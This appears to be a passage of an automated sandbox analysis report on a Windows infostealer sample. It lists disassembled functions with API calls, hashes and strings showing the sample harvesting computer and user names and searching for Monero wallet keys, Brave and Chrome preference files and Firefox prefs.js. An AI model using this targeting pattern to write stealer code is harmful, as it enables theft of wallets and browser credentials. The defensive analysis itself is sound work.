                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                              • Instruction ID: 29e7c0a3c31356872067b4a712dc2bd80a180e28e6d9c327df7fc4f59da43341
                              • Opcode Fuzzy Hash: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                              • Instruction Fuzzy Hash: C5F0E971641204BBE71496A4AC59FAAB7D8E705B55F300458F504E3280D5726E40DB50
                              APIs
                                • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                                • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                                • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                                • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                                • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                                • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                              • ExitProcess.KERNEL32 ref: 00FB11C6
                               Memory Dump Source (same dump set as listed for the preceding function)
                               • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                              • Instruction ID: fef84329eaefb41e387e83d8ea625990b8a309eb7f32de4e446d5221c0077e09
                              • Opcode Fuzzy Hash: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                              • Instruction Fuzzy Hash: 1AE0C2B5D0030223CA1433B6BD0BF2A328C6F40385F20043CFA09C3142FA2DF801AA64
                              APIs
                              • wsprintfA.USER32 ref: 00FC38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC38E3
                              • lstrcat.KERNEL32(?,?), ref: 00FC3935
                              • StrCmpCA.SHLWAPI(?,00FD0F70), ref: 00FC3947
                              • StrCmpCA.SHLWAPI(?,00FD0F74), ref: 00FC395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC3C67
                              • FindClose.KERNEL32(000000FF), ref: 00FC3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                              • Instruction ID: c62026397b93f8216f1dd746fd78770f126d087a5ce45314ee59ba41ac5db0c8
                              • Opcode Fuzzy Hash: ba182901db47596e9b79da6e8ded2ee83e8ea1025b9762fcb7fbf4ceaf1666a8
                              • Instruction Fuzzy Hash: 36A17FB29002099BCB34DB64DD85FEE7379BF88300F04859CA51E97145EB79AB84DF62
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00FD0B32,00FD0B2B,00000000,?,?,?,00FD13F4,00FD0B2A), ref: 00FBBEF5
                              • StrCmpCA.SHLWAPI(?,00FD13F8), ref: 00FBBF4D
                              • StrCmpCA.SHLWAPI(?,00FD13FC), ref: 00FBBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00FBC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                              • Instruction ID: 888022208d8e9f505e44632e9c1d8908fba4658c84a20a0da29e4efb9578a1cf
                              • Opcode Fuzzy Hash: 7b39ac6b48869e953637f47cdd7562824a5b895ebce1593deb53070dc9e3c705
                              • Instruction Fuzzy Hash: 97423372910109ABCB14FB60DE57FEE7379AF84304F40456CB50A96181EF38AB49DBA2
                              APIs
                              • wsprintfA.USER32 ref: 00FC492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                              • StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                              • StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00FC4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                              • Instruction ID: b256ce09fea5d03e95b49bf998b88d215fea6dcdc373a78405179b4abdd88d4c
                              • Opcode Fuzzy Hash: f30308f027a39617137692dff5ee270b890f600c17fcf94aa4306e2f7e3e8cfd
                              • Instruction Fuzzy Hash: EB6162B2900219ABCB34EBA0EC45FEA737CBF48701F04459CA51E92144EB75EB859FA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                              • wsprintfA.USER32 ref: 00FC45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                              • StrCmpCA.SHLWAPI(?,00FD0FC4), ref: 00FC45EB
                              • StrCmpCA.SHLWAPI(?,00FD0FC8), ref: 00FC4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC468B
                              • FindClose.KERNEL32(000000FF), ref: 00FC46A0
                              • lstrcat.KERNEL32(?,00DEE9F8), ref: 00FC46C5
                              • lstrcat.KERNEL32(?,00DECF10), ref: 00FC46D8
                              • lstrlen.KERNEL32(?), ref: 00FC46E5
                              • lstrlen.KERNEL32(?), ref: 00FC46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                              • Instruction ID: 4ec28969c1416ef91c83388230d4b44ef6f5b1d6dd14ae7b5fb5e35340e45804
                              • Opcode Fuzzy Hash: 636eb5ecac864942893d45a8e4d246a0fba78e61008c2c3202153b78795fb265
                              • Instruction Fuzzy Hash: 675155719002189BC724EB70DD9AFE9737CAF58700F40459CB51E92144EB79AA859F91
                              APIs
                              • wsprintfA.USER32 ref: 00FC3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FC3EDA
                              • StrCmpCA.SHLWAPI(?,00FD0FAC), ref: 00FC3F08
                              • StrCmpCA.SHLWAPI(?,00FD0FB0), ref: 00FC3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FC406C
                              • FindClose.KERNEL32(000000FF), ref: 00FC4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                              • Instruction ID: e913659a028f83bc401e1e495bc58ed9fdb62bf2d618f445fbbb980fbc5c2686
                              • Opcode Fuzzy Hash: 0bd13d4d57dfce75044853c128eee5379e8ea7ab957c78e8ff8eef99fe9bf381
                              • Instruction Fuzzy Hash: FB5165B2900219ABCB24EBB0DD46FEA737CBF48700F44459CB25D92044DB79AB859F61
                              APIs
                              • wsprintfA.USER32 ref: 00FBED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00FBED55
                              • StrCmpCA.SHLWAPI(?,00FD1538), ref: 00FBEDAB
                              • StrCmpCA.SHLWAPI(?,00FD153C), ref: 00FBEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00FBF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                              • Instruction ID: cbf3a044b7df04cac8de88851e8214f8e582ec873fa55d7201688fc508f6f69c
                              • Opcode Fuzzy Hash: c34352d4309462fda64fe1d2c582d264190d71829043d09ec0ae9ba8aee2cf0b
                              • Instruction Fuzzy Hash: F5E1BD7191111D9AEB68EB60DD53FEE7338AF54304F4041ADB50A62092EE387F8AEF51
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD15B8,00FD0D96), ref: 00FBF71E
                              • StrCmpCA.SHLWAPI(?,00FD15BC), ref: 00FBF76F
                              • StrCmpCA.SHLWAPI(?,00FD15C0), ref: 00FBF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00FBFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                              • Instruction ID: 3a9b12e7b7eb656574292ae50e9d79854e53069b81640732f7f908dac419dfb8
                              • Opcode Fuzzy Hash: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                              • Instruction Fuzzy Hash: 5DB143719001099BDB28EF60DD97FED7379AF54304F4085ADA40A97181EF38AB49EF92
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD510C,?,?,?,00FD51B4,?,?,00000000,?,00000000), ref: 00FB1923
                              • StrCmpCA.SHLWAPI(?,00FD525C), ref: 00FB1973
                              • StrCmpCA.SHLWAPI(?,00FD5304), ref: 00FB1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00FB1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB1E20
                              • FindClose.KERNEL32(000000FF), ref: 00FB1E32
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                              • Instruction ID: 838dbe4bf447caf1fb40172993dc19fa380b1cc96e80c5b1ee7f78dc0b74034d
                              • Opcode Fuzzy Hash: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                              • Instruction Fuzzy Hash: E912C97191011D9BDB29EB60DD97FEE7378AF54304F4041ADA10A620D1EE387B89EF92
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FD0C2E), ref: 00FBDE5E
                              • StrCmpCA.SHLWAPI(?,00FD14C8), ref: 00FBDEAE
                              • StrCmpCA.SHLWAPI(?,00FD14CC), ref: 00FBDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00FBE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                              • Instruction ID: a6a1d176a5b40724f01dea5b268f4a55d41ebc5e449bc8af8a7cd7f5e90c22c9
                              • Opcode Fuzzy Hash: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                              • Instruction Fuzzy Hash: 47F17B7181411D9BDB29EB60DD96FEE7338AF14304F40419EA41A62091EE387F8ADE52
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD14B0,00FD0C2A), ref: 00FBDAEB
                              • StrCmpCA.SHLWAPI(?,00FD14B4), ref: 00FBDB33
                              • StrCmpCA.SHLWAPI(?,00FD14B8), ref: 00FBDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBDDCC
